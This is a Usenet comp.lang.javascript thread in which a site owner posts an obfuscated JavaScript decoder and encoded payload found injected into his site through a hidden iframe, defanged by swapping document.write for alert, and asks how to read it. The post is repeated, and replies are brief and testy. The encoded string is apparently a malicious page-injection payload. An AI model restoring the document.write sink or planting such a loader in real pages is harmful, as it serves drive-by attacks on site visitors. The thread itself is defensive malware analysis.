Decoder for obfuscated code?



zsisco

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

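/**
 * Decode a string packed in this script's custom 6-bit alphabet, show the
 * text in chunks via alert(), and return the whole decoded text.
 *
 * Each input character is mapped through a 75-entry table (indexed by
 * char code minus 48) to a 6-bit value. Values are packed low bits first,
 * so four input characters yield three bytes, and every byte is XORed
 * with 165 before being turned into a character.
 *
 * The decoded text is handled as data only: it is shown with alert() and
 * returned to the caller, never written into the document or evaluated.
 * A caller who wants to read it should put the return value into a text
 * sink (a textarea's value, textContent), not into markup.
 *
 * NOTE(review): the argument string in the archived call that follows this
 * function contains "[email protected]" fragments. These look like the
 * hosting site's address masking rather than payload characters - if so,
 * this copy of the payload will not decode to what the poster saw.
 *
 * @param {string} x Encoded text.
 * @returns {string} All decoded chunks joined together ('' for empty input).
 */
function dc(x) {
  var remaining = x.length,
      chunkSize = 1024,
      i, j, r, value,
      p = 0, s = 0, w = 0,
      decoded = '',
      t = [0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
           40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63];

  // The chunk count is fixed from the initial length; `remaining` is
  // decremented inside the inner loop.
  for (j = Math.ceil(remaining / chunkSize); j > 0; j--) {
    r = '';
    for (i = Math.min(remaining, chunkSize); i > 0; i--, remaining--) {
      // Characters outside the table have no entry; treat them as 0
      // explicitly instead of relying on `undefined << s` coercing to 0.
      value = t[x.charCodeAt(p++) - 48] || 0;
      w |= value << s;

      if (s) {
        // At least 8 bits are buffered: emit the low byte, un-XORed.
        r += String.fromCharCode(165 ^ (w & 255));
        w >>= 8;
        s -= 2;
      } else {
        // Only 6 bits buffered so far; the next character completes a byte.
        s = 6;
      }
    }

    // Text-only display, kept from the poster's defanged version.
    alert("LINE: " + r);
    decoded += r;
  }

  return decoded;
}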


dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xkrBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@[email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYRqB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bCIFMDmg3@[email protected]@pRI6mg3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaPedLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oOMQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTFV@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSScqQm8[email protected]@HF798NrQe9Izi5lRewq7ew6Se5zznOnQmsL4ndmQR4FzodLzzoVCj9nQTBb@jWzzjGrQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbCjObQWxa@[email protected]@[email protected]@JkGz1FbP1zkRqwaBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4oxLTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQqpqQjdmQR4V7oda8qxaPj5V48zb@[email protected]@jGkRTFbQ4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmCmVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiGk6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@[email protected]@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@[email protected]@[email protected][email protected]_r6jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@[email protected]@[email 
protected]@JkGzjGrQtGmRqwaSHVzReFl7e81SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnTTzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzzzoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nNGzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJoWPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFAroIzMF2984[email protected]")

</script>
 

zsisco

The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!





Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

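/**
 * Decode a string packed in this script's custom 6-bit alphabet, show the
 * text in chunks via alert(), and return the whole decoded text.
 *
 * Each input character is mapped through a 75-entry table (indexed by
 * char code minus 48) to a 6-bit value. Values are packed low bits first,
 * so four input characters yield three bytes, and every byte is XORed
 * with 165 before being turned into a character.
 *
 * The decoded text is handled as data only: it is shown with alert() and
 * returned to the caller, never written into the document or evaluated.
 * A caller who wants to read it should put the return value into a text
 * sink (a textarea's value, textContent), not into markup.
 *
 * NOTE(review): the argument string in the archived call that follows this
 * function contains "[email protected]" fragments. These look like the
 * hosting site's address masking rather than payload characters - if so,
 * this copy of the payload will not decode to what the poster saw.
 *
 * @param {string} x Encoded text.
 * @returns {string} All decoded chunks joined together ('' for empty input).
 */
function dc(x) {
  var remaining = x.length,
      chunkSize = 1024,
      i, j, r, value,
      p = 0, s = 0, w = 0,
      decoded = '',
      t = [0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
           40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63];

  // The chunk count is fixed from the initial length; `remaining` is
  // decremented inside the inner loop.
  for (j = Math.ceil(remaining / chunkSize); j > 0; j--) {
    r = '';
    for (i = Math.min(remaining, chunkSize); i > 0; i--, remaining--) {
      // Characters outside the table have no entry; treat them as 0
      // explicitly instead of relying on `undefined << s` coercing to 0.
      value = t[x.charCodeAt(p++) - 48] || 0;
      w |= value << s;

      if (s) {
        // At least 8 bits are buffered: emit the low byte, un-XORed.
        r += String.fromCharCode(165 ^ (w & 255));
        w >>= 8;
        s -= 2;
      } else {
        // Only 6 bits buffered so far; the next character completes a byte.
        s = 6;
      }
    }

    // Text-only display, kept from the poster's defanged version.
    alert("LINE: " + r);
    decoded += r;
  }

  return decoded;
}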


dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xkrBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@[email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYRqB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bCIFMDmg3@[email protected]@pRI6mg3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaPedLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oOMQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTFV@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSScqQm8l74c25R4kQoxLTZBbCjOb48zb@[email protected]@jWzzjGrQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbCjObQWxa@[email protected]@[email protected]@JkGz1FbP1zkRqwaBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4oxLTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQqpqQjdmQR4V7oda8qxaPj5V48zb@[email protected]@jGkRTFbQ4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmCmVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiGk6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@[email protected]@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@[email protected]@[email protected][email protected]_r6jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@[email protected]@[email 
protected]@JkGzjGrQtGmRqwaSHVzReFl7e81SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnTTzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzzzoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nNGzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJoWPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFAroIzMF2984[email protected]")

</script>
 

Dr John Stockton

JRS: In article <[email protected]>,
dated Fri, 22 Sep 2006 13:59:01 remote, seen in
news:comp.lang.javascript, (e-mail address removed) posted :
Lines: 61
The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Do not top-post or over-quote - see FAQ.

You can run it yourself and read the alert; or you can safely use a
textarea to display r. Then you will be able to see what it decodes to.


It's a good idea to read the newsgroup and its FAQ.
 

zsisco

Well genius if you had run it you would have seen that is not the
answer. Jeez, anyone else besides the good doctor have any ideas?
 
